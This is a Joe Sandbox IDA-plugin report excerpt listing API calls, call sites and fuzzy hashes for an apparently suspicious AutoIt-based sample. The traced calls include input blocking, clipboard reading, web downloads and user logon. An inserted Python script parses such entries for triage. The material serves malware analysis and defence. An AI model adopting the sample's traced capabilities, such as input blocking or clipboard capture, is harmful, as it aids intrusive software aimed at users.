                                                • API String ID: 4104443479-100911408
                                                • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                APIs
                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Similarity
                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                • String ID:
                                                • API String ID: 901099227-0
                                                • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                APIs
                                                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                Similarity
                                                • API ID: Proc
                                                • String ID:
                                                • API String ID: 2346855178-0
                                                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 0045A38B
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
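The entries in this part of the report are the IDA plugin's per-function output: the Win32 calls a function makes (with a "Part of subcall function" line for calls one level down), the call sites, and the opcode and instruction fuzzy hashes. When triaging a dump this size it is quicker to reduce each entry to a one-line behaviour summary. The script below is an added example and is not part of the Joe Sandbox report or its tooling. It parses a constructed excerpt in the report's rendered layout (three of the entries above, trimmed), decodes the clipboard format constants that appear as `0000000D` and `00000001` in the clipboard function (CF_UNICODETEXT and CF_TEXT from winuser.h) and the `BlockInput(00000001)` flag, and tags each function with what its API set implies. The SAMPLE text, the tag wording and the helper names are the example's own assumptions.

```python
"""Reduce Joe Sandbox 'APIs' / 'Similarity' function entries to per-function API summaries."""
import re

# Constructed sample: three entries copied from the report as rendered above, with the
# repeated "Memory Dump Source" blocks and the empty "String ID" lines trimmed.
SAMPLE = """\
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Similarity
• API ID: BlockInput
• Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
"""

# One call line: optional "Part of subcall function XXXXXXXX:" prefix, Name.MODULE(args), ref: site
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$", re.IGNORECASE)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
                      r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$")
# Standard clipboard format constants from winuser.h; the trace shows them as 8-digit hex.
CLIPBOARD_FORMATS = {1: "CF_TEXT", 2: "CF_BITMAP", 7: "CF_OEMTEXT", 8: "CF_DIB",
                     13: "CF_UNICODETEXT", 15: "CF_HDROP", 17: "CF_DIBV5"}


def decode_args(name, args):
    """Render the argument list, naming clipboard formats and BlockInput's fBlockIt flag."""
    if args is None:
        return ""
    parts = [a.strip() for a in args.split(",")]
    if name in ("GetClipboardData", "IsClipboardFormatAvailable") and re.fullmatch(r"[0-9A-Fa-f]{8}", parts[0]):
        fmt = int(parts[0], 16)
        parts[0] = CLIPBOARD_FORMATS.get(fmt, f"format 0x{fmt:X}")
    elif name == "BlockInput":
        parts[0] = "TRUE (block)" if parts[0] == "00000001" else "FALSE (unblock)"
    return ", ".join(parts)


def tag_calls(calls):
    """Map one function's API set to the behaviours it implies (tag wording is the example's own)."""
    names = {c["name"] for c in calls}
    tags = []
    if {"OpenClipboard", "GetClipboardData"} <= names:
        fmts = sorted({c["args"].split(",")[0] for c in calls if c["name"] == "GetClipboardData"})
        tags.append("reads clipboard: " + "/".join(fmts))
    if any(c["name"] == "BlockInput" and c["args"].startswith("TRUE") for c in calls):
        tags.append("blocks keyboard/mouse input")
    if "InternetReadFile" in names:
        tags.append("downloads data over WinINet")
    if {"FindFirstFileW", "FindNextFileW"} <= names:
        tags.append("enumerates directory contents")
    return tags


def finish(entry):
    """Attach the call-site range of the function's own (non-subcall) calls and its behaviour tags."""
    refs = [int(c["ref"], 16) for c in entry["calls"] if c["via_subcall"] is None]
    entry["ref_range"] = f"{min(refs):08X}-{max(refs):08X}" if refs else None
    entry["tags"] = tag_calls(entry["calls"])
    return entry


def parse_entries(text):
    """Split the rendered report text into entries; an 'Instruction Fuzzy Hash' line closes one."""
    entries, cur = [], None
    for line in text.splitlines():
        m = CALL_RE.match(line) or FIELD_RE.match(line)
        if not m:
            continue  # section headings such as "APIs" or "Similarity" carry no data
        cur = cur or {"calls": [], "fields": {}}
        if "name" in m.groupdict():
            cur["calls"].append({"name": m["name"], "module": m["module"].upper(),
                                 "args": decode_args(m["name"], m["args"]), "ref": m["ref"].upper(),
                                 "via_subcall": m["sub"].upper() if m["sub"] else None})
        else:
            cur["fields"][m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":
                entries.append(finish(cur))
                cur = None
    if cur and cur["calls"]:  # tolerate a truncated final entry
        entries.append(finish(cur))
    return entries


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e["ref_range"], e["fields"].get("API ID"), e["tags"])
```

Feeding the whole rendered report through `parse_entries` gives one record per function with its decoded call list, call-site range, API ID and fuzzy hashes, which is enough to pivot on (for example, all functions touching the clipboard, or every call site of `InternetReadFile`) without scrolling the page.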
                                                APIs
                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N@
                                                • API String ID: 0-1509896676
                                                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                APIs
                                                • DeleteObject.GDI32(?), ref: 0045953B
                                                • DeleteObject.GDI32(?), ref: 00459551
                                                • DestroyWindow.USER32(?), ref: 00459563
                                                • GetDesktopWindow.USER32 ref: 00459581
                                                • GetWindowRect.USER32(00000000), ref: 00459588
                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                • ShowWindow.USER32(?,00000004), ref: 00459865
                                                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                • GetStockObject.GDI32(00000011), ref: 004598CD
                                                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                • DeleteDC.GDI32(00000000), ref: 004598F8
                                                • _wcslen.LIBCMT ref: 00459916
                                                • _wcscpy.LIBCMT ref: 0045993A
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                • GetDC.USER32(00000000), ref: 004599FC
                                                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                • String ID: $AutoIt v3$DISPLAY$static
                                                • API String ID: 4040870279-2373415609
                                                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 0044181E
                                                • SetTextColor.GDI32(?,?), ref: 00441826
                                                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                • GetSysColor.USER32(0000000F), ref: 00441849
                                                • SetBkColor.GDI32(?,?), ref: 00441864
                                                • SelectObject.GDI32(?,?), ref: 00441874
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                • GetSysColor.USER32(00000010), ref: 004418B2
                                                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                • DeleteObject.GDI32(?), ref: 004418D5
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                • FillRect.USER32(?,?,?), ref: 00441970
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                • String ID:
                                                • API String ID: 69173610-0
                                                • Opcode ID: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                • Opcode Fuzzy Hash: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                APIs
                                                • DestroyWindow.USER32(?), ref: 004590F2
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                • GetStockObject.GDI32(00000011), ref: 004592AC
                                                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                • DeleteDC.GDI32(00000000), ref: 004592D6
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                • GetStockObject.GDI32(00000011), ref: 004593D3
